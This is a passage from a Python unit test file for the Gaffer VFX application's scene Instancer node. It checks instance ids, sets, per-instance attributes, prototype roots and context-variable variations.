"/object/instances/sphere/3",
}
)
self.assertEqual(
set( instancer["out"].set( "cubeSet" ).value.paths() ),
{
"/object/instances/cubeGroup/1/cube",
"/object/instances/cubeGroup/2/cube",
}
)
# Test encapsulation options
encapInstancer = GafferScene.Instancer()
encapInstancer["in"].setInput( objectToScene["out"] )
encapInstancer["prototypes"].setInput( instances["out"] )
encapInstancer["parent"].setValue( "/object" )
encapInstancer["prototypeIndex"].setValue( "index" )
encapInstancer["encapsulateInstanceGroups"].setValue( True )
unencapFilter = GafferScene.PathFilter()
unencapFilter["paths"].setValue( IECore.StringVectorData( [ "/..." ] ) )
unencap = GafferScene.Unencapsulate()
unencap["in"].setInput( encapInstancer["out"] )
unencap["filter"].setInput( unencapFilter["out"] )
# Sets should be empty while encapsulated
self.assertEqual( encapInstancer["out"].set( "sphereSet" ).value.paths(), [] )
self.assertEqual( encapInstancer["out"].set( "cubeSet" ).value.paths(), [] )
# But should match after unencapsulating
self.assertScenesEqual( unencap["out"], instancer["out"] )
def testSetsWithDeepPrototypeRoots( self ) :
script = self.buildPrototypeRootsScript()
script["sphere"]["sets"].setValue( "sphereSet" )
script["cube"]["sets"].setValue( "cubeSet" )
script["set"] = GafferScene.Set()
script["set"]["name"].setValue( "barSet" )
script["set"]["in"].setInput( script["prototypes"]["out"] )
script["barFilter"] = GafferScene.PathFilter()
script["barFilter"]["paths"].setValue( IECore.StringVectorData( [ "/foo/bar", "/bar" ] ) )
script["set"]["filter"].setInput( script["barFilter"]["out"] )
script["instancer"]["prototypes"].setInput( script["set"]["out"] )
script["instancer"]["prototypeMode"].setValue( GafferScene.Instancer.PrototypeMode.IndexedRootsList )
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "/foo/bar", "/bar" ] ) )
self.assertEqual(
script["instancer"]["out"]["setNames"].getValue(),
IECore.InternedStringVectorData( [ "sphereSet", "cubeSet", "barSet" ] )
)
self.assertEqual(
set( script["instancer"]["out"].set( "sphereSet" ).value.paths() ),
{
"/object/instances/bar/0/sphere",
"/object/instances/bar/3/sphere",
}
)
self.assertEqual(
set( script["instancer"]["out"].set( "cubeSet" ).value.paths() ),
{
"/object/instances/bar1/1/baz/cube",
"/object/instances/bar1/2/baz/cube",
}
)
self.assertEqual(
set( script["instancer"]["out"].set( "barSet" ).value.paths() ),
{
"/object/instances/bar/0",
"/object/instances/bar/3",
"/object/instances/bar1/1",
"/object/instances/bar1/2",
}
)
def testIds( self ) :
points = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( x, 0, 0 ) for x in range( 0, 4 ) ] ) )
points["id"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.IntVectorData( [ 10, 100, 111, 5 ] ),
)
points["index"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.IntVectorData( [ 0, 1, 0, 1 ] ),
)
objectToScene = GafferScene.ObjectToScene()
objectToScene["object"].setValue( points )
sphere = GafferScene.Sphere()
cube = GafferScene.Cube()
instances = GafferScene.Parent()
instances["in"].setInput( sphere["out"] )
instances["children"][0].setInput( cube["out"] )
instances["parent"].setValue( "/" )
instancer = GafferScene.Instancer()
instancer["in"].setInput( objectToScene["out"] )
instancer["prototypes"].setInput( instances["out"] )
instancer["parent"].setValue( "/object" )
instancer["prototypeIndex"].setValue( "index" )
instancer["id"].setValue( "id" )
self.assertEqual( instancer["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "sphere", "cube" ] ) )
self.assertEqual( instancer["out"].childNames( "/object/instances/sphere" ), IECore.InternedStringVectorData( [ "10", "111" ] ) )
self.assertEqual( instancer["out"].childNames( "/object/instances/cube" ), IECore.InternedStringVectorData( [ "5", "100" ] ) )
self.assertEqual( instancer["out"].childNames( "/object/instances/sphere/10" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].childNames( "/object/instances/sphere/111" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].childNames( "/object/instances/cube/100" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].childNames( "/object/instances/cube/5" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( instancer["out"].object( "/object/instances/sphere" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( instancer["out"].object( "/object/instances/cube" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( instancer["out"].object( "/object/instances/sphere/10" ), sphere["out"].object( "/sphere" ) )
self.assertEqual( instancer["out"].object( "/object/instances/sphere/111" ), sphere["out"].object( "/sphere" ) )
self.assertEqual( instancer["out"].object( "/object/instances/cube/100" ), cube["out"].object( "/cube" ) )
self.assertEqual( instancer["out"].object( "/object/instances/cube/5" ), cube["out"].object( "/cube" ) )
self.assertEqual( instancer["out"].transform( "/object/instances" ), imath.M44f() )
self.assertEqual( instancer["out"].transform( "/object/instances/sphere" ), imath.M44f() )
self.assertEqual( instancer["out"].transform( "/object/instances/cube" ), imath.M44f() )
self.assertEqual( instancer["out"].transform( "/object/instances/sphere/10" ), imath.M44f() )
self.assertEqual( instancer["out"].transform( "/object/instances/sphere/111" ), imath.M44f().translate( imath.V3f( 2, 0, 0 ) ) )
self.assertEqual( instancer["out"].transform( "/object/instances/cube/100" ), imath.M44f().translate( imath.V3f( 1, 0, 0 ) ) )
self.assertEqual( instancer["out"].transform( "/object/instances/cube/5" ), imath.M44f().translate( imath.V3f( 3, 0, 0 ) ) )
six.assertRaisesRegex( self,
Gaffer.ProcessException,
'Instancer.out.transform : Instance id "77" is invalid. Topology may have changed during shutter.',
instancer["out"].transform, "/object/instances/cube/77"
)
self.assertSceneValid( instancer["out"] )
def testNegativeIdsAndIndices( self ) :
points = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( x, 0, 0 ) for x in range( 0, 2 ) ] ) )
points["id"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.IntVectorData( [ -10, -5 ] ),
)
points["index"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.IntVectorData( [ -1, -2 ] ),
)
objectToScene = GafferScene.ObjectToScene()
objectToScene["object"].setValue( points )
sphere = GafferScene.Sphere()
cube = GafferScene.Cube()
instances = GafferScene.Parent()
instances["in"].setInput( sphere["out"] )
instances["children"][0].setInput( cube["out"] )
instances["parent"].setValue( "/" )
instancer = GafferScene.Instancer()
instancer["in"].setInput( objectToScene["out"] )
instancer["prototypes"].setInput( instances["out"] )
instancer["parent"].setValue( "/object" )
instancer["prototypeIndex"].setValue( "index" )
instancer["id"].setValue( "id" )
self.assertEqual( instancer["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "sphere", "cube" ] ) )
self.assertEqual( instancer["out"].childNames( "/object/instances/sphere" ), IECore.InternedStringVectorData( [ "-5" ] ) )
self.assertEqual( instancer["out"].childNames( "/object/instances/cube" ), IECore.InternedStringVectorData( [ "-10" ] ) )
self.assertEqual( instancer["out"].childNames( "/object/instances/sphere/-5" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].childNames( "/object/instances/cube/-10" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( instancer["out"].object( "/object/instances/sphere" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( instancer["out"].object( "/object/instances/cube" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( instancer["out"].object( "/object/instances/sphere/-5" ), sphere["out"].object( "/sphere" ) )
self.assertEqual( instancer["out"].object( "/object/instances/cube/-10" ), cube["out"].object( "/cube" ) )
self.assertSceneValid( instancer["out"] )
def testDuplicateIds( self ) :
points = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( x, 0, 0 ) for x in range( 6 ) ] ) )
points["id"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.IntVectorData( [ 0, 0, 2, 2, 4, 4 ] ),
)
objectToScene = GafferScene.ObjectToScene()
objectToScene["object"].setValue( points )
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( objectToScene["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "/object" )
instancer["id"].setValue( "id" )
self.assertSceneValid( instancer["out"] )
self.assertEqual( instancer["out"].childNames( "/object/instances/sphere" ), IECore.InternedStringVectorData( [ "0", "2", "4" ] ) )
self.assertEqual( instancer["out"].transform( "/object/instances/sphere/0" ), imath.M44f().translate( imath.V3f( 0, 0, 0 ) ) )
self.assertEqual( instancer["out"].transform( "/object/instances/sphere/2" ), imath.M44f().translate( imath.V3f( 2, 0, 0 ) ) )
self.assertEqual( instancer["out"].transform( "/object/instances/sphere/4" ), imath.M44f().translate( imath.V3f( 4, 0, 0 ) ) )
def testAttributes( self ) :
points = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( x, 0, 0 ) for x in range( 0, 2 ) ] ) )
points["testFloat"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.FloatVectorData( [ 0, 1 ] ),
)
points["testColor"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.Color3fVectorData( [ imath.Color3f( 1, 0, 0 ), imath.Color3f( 0, 1, 0 ) ] ),
)
points["testPoint"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.V3fVectorData(
[ imath.V3f( 0, 0, 0 ), imath.V3f( 1, 1, 1 ) ],
IECore.GeometricData.Interpretation.Point
),
)
objectToScene = GafferScene.ObjectToScene()
objectToScene["object"].setValue( points )
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( objectToScene["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "/object" )
self.assertEqual(
instancer["out"].attributes( "/object/instances" ),
IECore.CompoundObject()
)
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere" ),
IECore.CompoundObject()
)
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/0" ),
IECore.CompoundObject()
)
instancer["attributes"].setValue( "testFloat testColor testPoint" )
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/0" ),
IECore.CompoundObject( {
"testFloat" : IECore.FloatData( 0.0 ),
"testColor" : IECore.Color3fData( imath.Color3f( 1, 0, 0 ) ),
"testPoint" : IECore.V3fData(
imath.V3f( 0 ),
IECore.GeometricData.Interpretation.Point
)
} )
)
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/1" ),
IECore.CompoundObject( {
"testFloat" : IECore.FloatData( 1.0 ),
"testColor" : IECore.Color3fData( imath.Color3f( 0, 1, 0 ) ),
"testPoint" : IECore.V3fData(
imath.V3f( 1 ),
IECore.GeometricData.Interpretation.Point
)
} )
)
instancer["attributePrefix"].setValue( "user:" )
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/0" ),
IECore.CompoundObject( {
"user:testFloat" : IECore.FloatData( 0.0 ),
"user:testColor" : IECore.Color3fData( imath.Color3f( 1, 0, 0 ) ),
"user:testPoint" : IECore.V3fData(
imath.V3f( 0 ),
IECore.GeometricData.Interpretation.Point
)
} )
)
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/1" ),
IECore.CompoundObject( {
"user:testFloat" : IECore.FloatData( 1.0 ),
"user:testColor" : IECore.Color3fData( imath.Color3f( 0, 1, 0 ) ),
"user:testPoint" : IECore.V3fData(
imath.V3f( 1 ),
IECore.GeometricData.Interpretation.Point
)
} )
)
instancer["attributePrefix"].setValue( "foo:" )
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/0" ),
IECore.CompoundObject( {
"foo:testFloat" : IECore.FloatData( 0.0 ),
"foo:testColor" : IECore.Color3fData( imath.Color3f( 1, 0, 0 ) ),
"foo:testPoint" : IECore.V3fData(
imath.V3f( 0 ),
IECore.GeometricData.Interpretation.Point
)
} )
)
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/1" ),
IECore.CompoundObject( {
"foo:testFloat" : IECore.FloatData( 1.0 ),
"foo:testColor" : IECore.Color3fData( imath.Color3f( 0, 1, 0 ) ),
"foo:testPoint" : IECore.V3fData(
imath.V3f( 1 ),
IECore.GeometricData.Interpretation.Point
)
} )
)
def testEmptyAttributesHaveConstantHash( self ) :
points = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( x, 0, 0 ) for x in range( 0, 2 ) ] ) )
objectToScene = GafferScene.ObjectToScene()
objectToScene["object"].setValue( points )
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( objectToScene["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "/object" )
self.assertEqual(
instancer["out"].attributesHash( "/object/instances/sphere/0" ),
instancer["out"].attributesHash( "/object/instances/sphere/1" ),
)
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/0" ),
instancer["out"].attributes( "/object/instances/sphere/1" ),
)
def testEditAttributes( self ) :
points = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( x, 0, 0 ) for x in range( 0, 2 ) ] ) )
points["testFloat"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.FloatVectorData( [ 0, 1 ] ),
)
objectToScene = GafferScene.ObjectToScene()
objectToScene["object"].setValue( points )
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( objectToScene["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "/object" )
instancer["attributes"].setValue( "test*" )
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/0" ),
IECore.CompoundObject( {
"testFloat" : IECore.FloatData( 0.0 ),
} )
)
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/1" ),
IECore.CompoundObject( {
"testFloat" : IECore.FloatData( 1.0 ),
} )
)
points["testFloat"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.FloatVectorData( [ 1, 2 ] ),
)
objectToScene["object"].setValue( points )
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/0" ),
IECore.CompoundObject( {
"testFloat" : IECore.FloatData( 1.0 ),
} )
)
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/1" ),
IECore.CompoundObject( {
"testFloat" : IECore.FloatData( 2.0 ),
} )
)
def testPrototypeAttributes( self ) :
script = self.buildPrototypeRootsScript()
# add some attributes throughout the prototype hierarchies
script["attrFilter"] = GafferScene.PathFilter()
script["attrFilter"]["paths"].setValue( IECore.StringVectorData( [ "/foo", "/foo/bar", "/bar", "/bar/baz/cube" ] ) )
script["attributes"] = GafferScene.StandardAttributes()
script["attributes"]["in"].setInput( script["instancer"]["prototypes"].getInput() )
script["attributes"]["filter"].setInput( script["attrFilter"]["out"] )
script["attributes"]["attributes"]["deformationBlur"]["enabled"].setValue( True )
script["attrSpreadsheet"] = Gaffer.Spreadsheet()
script["attrSpreadsheet"]["selector"].setValue( "${scene:path}" )
script["attrSpreadsheet"]["rows"].addColumn( script["attributes"]["attributes"]["deformationBlur"]["value"] )
script["attributes"]["attributes"]["deformationBlur"]["value"].setInput( script["attrSpreadsheet"]["out"][0] )
for location, value in ( ( "/foo", False ), ( "/foo/bar", True ), ( "/bar", True ), ( "/bar/baz/cube", False ) ) :
row = script["attrSpreadsheet"]["rows"].addRow()
row["name"].setValue( location )
row["cells"][0]["value"].setValue( value )
script["instancer"]["prototypes"].setInput( script["attributes"]["out"] )
script["instancer"]["prototypeMode"].setValue( GafferScene.Instancer.PrototypeMode.IndexedRootsList )
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "/foo", "/bar" ] ) )
self.assertEqual( script["instancer"]["out"].attributes( "/object/instances" ), IECore.CompoundObject() )
self.assertEqual( script["instancer"]["out"].attributes( "/object/instances/foo" ), IECore.CompoundObject() )
self.assertEqual( script["instancer"]["out"].attributes( "/object/instances/bar" ), IECore.CompoundObject() )
for i in [ "0", "3" ] :
self.assertEqual( script["instancer"]["out"].attributes( "/object/instances/foo/{i}".format( i=i ) )["gaffer:deformationBlur"].value, False )
self.assertEqual( script["instancer"]["out"].fullAttributes( "/object/instances/foo/{i}".format( i=i ) )["gaffer:deformationBlur"].value, False )
self.assertEqual( script["instancer"]["out"].attributes( "/object/instances/foo/{i}/bar".format( i=i ) )["gaffer:deformationBlur"].value, True )
self.assertEqual( script["instancer"]["out"].attributes( "/object/instances/foo/{i}/bar/sphere" ), IECore.CompoundObject() )
self.assertEqual( script["instancer"]["out"].fullAttributes( "/object/instances/foo/{i}/bar/sphere".format( i=i ) )["gaffer:deformationBlur"].value, True )
for i in [ "1", "2" ] :
self.assertEqual( script["instancer"]["out"].attributes( "/object/instances/bar/{i}".format( i=i ) )["gaffer:deformationBlur"].value, True )
self.assertEqual( script["instancer"]["out"].fullAttributes( "/object/instances/bar/{i}".format( i=i ) )["gaffer:deformationBlur"].value, True )
self.assertEqual( script["instancer"]["out"].attributes( "/object/instances/bar/{i}/baz".format( i=i ) ), IECore.CompoundObject() )
self.assertEqual( script["instancer"]["out"].fullAttributes( "/object/instances/bar/{i}/baz".format( i=i ) )["gaffer:deformationBlur"].value, True )
self.assertEqual( script["instancer"]["out"].attributes( "/object/instances/bar/{i}/baz/cube".format( i=i ) )["gaffer:deformationBlur"].value, False )
self.assertSceneValid( script["instancer"]["out"] )
def testUnconnectedInstanceInput( self ) :
plane = GafferScene.Plane()
plane["sets"].setValue( "A" )
plane["divisions"].setValue( imath.V2i( 1, 500 ) )
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["parent"].setValue( "/plane" )
self.assertEqual( instancer["out"].set( "A" ).value.paths(), [ "/plane" ] )
def testDirtyPropagation( self ) :
plane = GafferScene.Plane()
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["prototypes"].setInput( plane["out"] )
cs = GafferTest.CapturingSlot( instancer.plugDirtiedSignal() )
instancer["parent"].setValue( "plane" )
self.assertIn( instancer["out"]["childNames"], { x[0] for x in cs } )
del cs[:]
filter = GafferScene.PathFilter()
instancer["filter"].setInput( filter["out"] )
self.assertIn( instancer["out"]["childNames"], { x[0] for x in cs } )
def testNoPrimitiveAtParent( self ) :
group = GafferScene.Group()
sphere = GafferScene.Sphere()
sphere["sets"].setValue( "setA" )
groupFilter = GafferScene.PathFilter()
groupFilter["paths"].setValue( IECore.StringVectorData( [ "/group" ] ) )
instancer = GafferScene.Instancer()
instancer["in"].setInput( group["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["filter"].setInput( groupFilter["out"] )
self.assertSceneValid( instancer["out"] )
self.assertEqual( instancer["out"].childNames( "/group/instances" ) , IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].set( "setA" ) , IECore.PathMatcherData() )
def testSetPassThroughs( self ) :
# If the prototypes don't provide a set, then we should do a perfect
# pass through.
plane = GafferScene.Plane()
plane["sets"].setValue( "A" )
planeFilter = GafferScene.PathFilter()
planeFilter["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["filter"].setInput( planeFilter["out"] )
self.assertTrue( instancer["out"].exists( "/plane/instances/sphere/0" ) )
self.assertEqual( instancer["out"].setHash( "A" ), instancer["in"].setHash( "A" ) )
self.assertEqual( instancer["out"].set( "A" ), instancer["in"].set( "A" ) )
self.assertEqual( instancer["out"].set( "A" ).value.paths(), [ "/plane" ] )
def testContexts( self ):
points = IECoreScene.PointsPrimitive(
IECore.V3fVectorData(
[ imath.V3f( i, 0, 0 ) for i in range( 100 ) ]
)
)
points["floatVar"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData(
[ 2 * math.sin( i ) for i in range( 100 ) ]
) )
points["vectorVar"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData(
[ imath.V3f( i + 2, i + 3, i + 4 ) for i in range( 100 ) ]
) )
points["uvVar"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V2fVectorData(
[ imath.V2f( i * 0.01, i * 0.02 ) for i in range( 100 ) ]
) )
points["intVar"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.IntVectorData(
[ i for i in range( 100 ) ]
) )
points["colorVar"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.Color3fVectorData(
[ imath.Color3f( i * 0.1 + 2, i * 0.1 + 3, i * 0.1 + 4 ) for i in range( 100 ) ]
) )
points["color4fVar"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.Color4fVectorData(
[ imath.Color4f( i * 0.1 + 2, i * 0.1 + 3, i * 0.1 + 4, i * 0.1 + 5 ) for i in range( 100 ) ]
) )
points["stringVar"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.StringVectorData(
[ "foo%i"%(i//34) for i in range( 100 ) ]
) )
points["unindexedRoots"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.StringVectorData(
[ ["cube","plane","sphere"][i//34] for i in range( 100 ) ]
) )
points["indexedRoots"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.StringVectorData( [ "cube","plane","sphere"] ),
IECore.IntVectorData( [(i//34) for i in range( 100 )] ),
)
pointsSource = GafferScene.ObjectToScene()
pointsSource["name"].setValue( "points" )
pointsSource["object"].setValue( points )
attributeSphere = GafferScene.Sphere()
sphereFilter = GafferScene.PathFilter()
sphereFilter["paths"].setValue( IECore.StringVectorData( [ '/sphere' ] ) )
# In any practical situation where we just needed to set up attributes, we could use the "attributes"
# plug to set them up more cheaply. But for testing, setting up attributes is simpler than any realistic
# test
customAttributes = GafferScene.CustomAttributes()
customAttributes["in"].setInput( attributeSphere["out"] )
customAttributes["filter"].setInput( sphereFilter["out"] )
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "floatAttr", Gaffer.FloatPlug( "value", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ), True, "member1" ) )
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "vectorAttr", Gaffer.V3fPlug( "value", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ), True, "member2" ) )
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "uvAttr", Gaffer.V2fPlug( "value", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ), True, "member3" ) )
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "intAttr", Gaffer.IntPlug( "value", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic, ), True, "member4" ) )
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "colorAttr", Gaffer.Color3fPlug( "value", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ), True, "member5" ) )
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "color4fAttr", Gaffer.Color4fPlug( "value", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ), True, "member6" ) )
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "stringAttr", Gaffer.StringPlug( "value", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ), True, "member7" ) )
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "seedAttr", Gaffer.IntPlug( "value", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic, ), True, "member8" ) )
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "frameAttr", Gaffer.FloatPlug( "value", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic, ), True, "member9" ) )
customAttributes["ReadContextExpression"] = Gaffer.Expression()
customAttributes["ReadContextExpression"].setExpression( inspect.cleandoc(
"""
parent["attributes"]["member1"]["value"] = context.get( "floatVar", -1 )
parent["attributes"]["member2"]["value"] = context.get( "vectorVar", imath.V3f(-1) )
parent["attributes"]["member3"]["value"] = context.get( "uvVar", imath.V2f(-1) )
parent["attributes"]["member4"]["value"] = context.get( "intVar", -1 )
parent["attributes"]["member5"]["value"] = context.get( "colorVar", imath.Color3f( -1 ) )
parent["attributes"]["member6"]["value"] = context.get( "color4fVar", imath.Color4f( -1 ) )
parent["attributes"]["member7"]["value"] = context.get( "stringVar", "" )
parent["attributes"]["member8"]["value"] = context.get( "seed", -1 )
parent["attributes"]["member9"]["value"] = context.get( "frame", -1 )
"""
) )
group = GafferScene.Group()
group["in"][0].setInput( customAttributes["out"] )
group["name"].setValue( 'withAttrs' )
cube = GafferScene.Cube()
plane = GafferScene.Plane()
sphere = GafferScene.Sphere()
parent = GafferScene.Parent()
parent["parent"].setValue( '/' )
parent["in"].setInput( group["out"] )
parent["children"][0].setInput( cube["out"] )
parent["children"][1].setInput( plane["out"] )
parent["children"][2].setInput( sphere["out"] )
pointsFilter = GafferScene.PathFilter()
pointsFilter["paths"].setValue( IECore.StringVectorData( [ '/points' ] ) )
instancer = GafferScene.Instancer()
instancer["in"].setInput( pointsSource["out"] )
instancer["filter"].setInput( pointsFilter["out"] )
instancer["prototypes"].setInput( parent["out"] )
def uniqueCounts():
return dict( [ (i[0], i[1].value) for i in instancer["variations"].getValue().items() ] )
def childNameStrings( location ):
return [ i.value() for i in instancer['out'].childNames( location ) ]
def testAttributes( **expected ):
a = [ instancer['out'].attributes( "points/instances/withAttrs/" + i.value() + "/sphere" ) for i in instancer['out'].childNames( "points/instances/withAttrs" ) ]
r = {}
for n in a[0].keys():
r = [ i[n].value for i in a]
if n + "_seedCount" in expected:
self.assertEqual( len( set( r ) ), expected[ n + "_seedCount" ] )
elif n in expected:
self.assertEqual( len(r), len(expected[n]) )
if type( r[0] ) == float:
if r != expected[n]:
for i in range( len( r ) ):
self.assertAlmostEqual( r[i], expected[n][i], places = 6 )
else:
self.assertEqual( r, expected[n] )
else:
if type( r[0] ) == str:
self.assertEqual( r, [""] * len( r ) )
else:
self.assertEqual( r, [type( r[0] )( -1 )] * len( r ) )
# Compatible with C++ rounding
def compatRound( x ):
if x >= 0.0:
return math.floor(x + 0.5)
else:
return math.ceil(x - 0.5)
def quant( x, q ):
return compatRound( float( x ) / q ) * q
self.assertEqual( uniqueCounts(), { "" : 1 } )
self.assertEqual( childNameStrings( "points/instances" ), [ "withAttrs", "cube", "plane", "sphere" ] )
self.assertEqual( childNameStrings( "points/instances/withAttrs" ), [ str(i) for i in range( 100 ) ] )
self.assertEqual( childNameStrings( "points/instances/cube" ), [] )
self.assertEqual( childNameStrings( "points/instances/plane" ), [] )
self.assertEqual( childNameStrings( "points/instances/sphere" ), [] )
instancer["prototypeMode"].setValue( GafferScene.Instancer.PrototypeMode.RootPerVertex )
instancer["prototypeRoots"].setValue( "indexedRoots" )
self.assertEqual( uniqueCounts(), { "" : 3 } )
self.assertEqual( childNameStrings( "points/instances/cube" ), [ str(i) for i in range( 0, 34 ) ] )
self.assertEqual( childNameStrings( "points/instances/plane" ), [ str(i) for i in range( 34, 68 ) ] )
self.assertEqual( childNameStrings( "points/instances/sphere" ), [ str(i) for i in range( 68, 100 ) ] )
instancer["prototypeRoots"].setValue( "unindexedRoots" )
"""
# How things should work
self.assertEqual( uniqueCounts(), { "" : 3 } )
self.assertEqual( childNameStrings( "points/instances/cube" ), [ str(i) for i in range( 0, 34 ) ] )
self.assertEqual( childNameStrings( "points/instances/plane" ), [ str(i) for i in range( 34, 68 ) ] )
self.assertEqual( childNameStrings( "points/instances/sphere" ), [ str(i) for i in range( 68, 100 ) ] )
"""
# How things currently work
self.assertEqual( uniqueCounts(), { "" : 1 } )
self.assertEqual( childNameStrings( "points/instances/cube" ), [ str(i) for i in range( 100 ) ] )
self.assertEqual( childNameStrings( "points/instances/plane" ), [] )
self.assertEqual( childNameStrings( "points/instances/sphere" ), [] )
instancer["prototypeMode"].setValue( GafferScene.Instancer.PrototypeMode.IndexedRootsList )
instancer["prototypeIndex"].setValue( 'intVar' )
self.assertEqual( uniqueCounts(), { "" : 4 } )
self.assertEqual( childNameStrings( "points/instances/withAttrs" ), [ str(i) for i in range( 0, 100, 4 ) ] )
self.assertEqual( childNameStrings( "points/instances/cube" ), [ str(i) for i in range( 1, 100, 4 ) ] )
self.assertEqual( childNameStrings( "points/instances/plane" ), [ str(i) for i in range( 2, 100, 4 ) ] )
self.assertEqual( childNameStrings( "points/instances/sphere" ), [ str(i) for i in range( 3, 100, 4 ) ] )
# No context overrides yet
testAttributes( frameAttr = [ 1 ] * 25 )
instancer["contextVariables"].addChild( GafferScene.Instancer.ContextVariablePlug( "context" ) )
instancer["contextVariables"][0]["name"].setValue( "floatVar" )
instancer["contextVariables"][0]["quantize"].setValue( 0 )
# With zero quantization, everything is now unique
testAttributes( frameAttr = [ 1 ] * 25, floatAttr = [ 2 * math.sin( i ) for i in range(0, 100, 4) ] )
# Check both the global unique count, and the per-context variable unique counts
self.assertEqual( uniqueCounts(), { "" : 100, "floatVar" : 100 } )
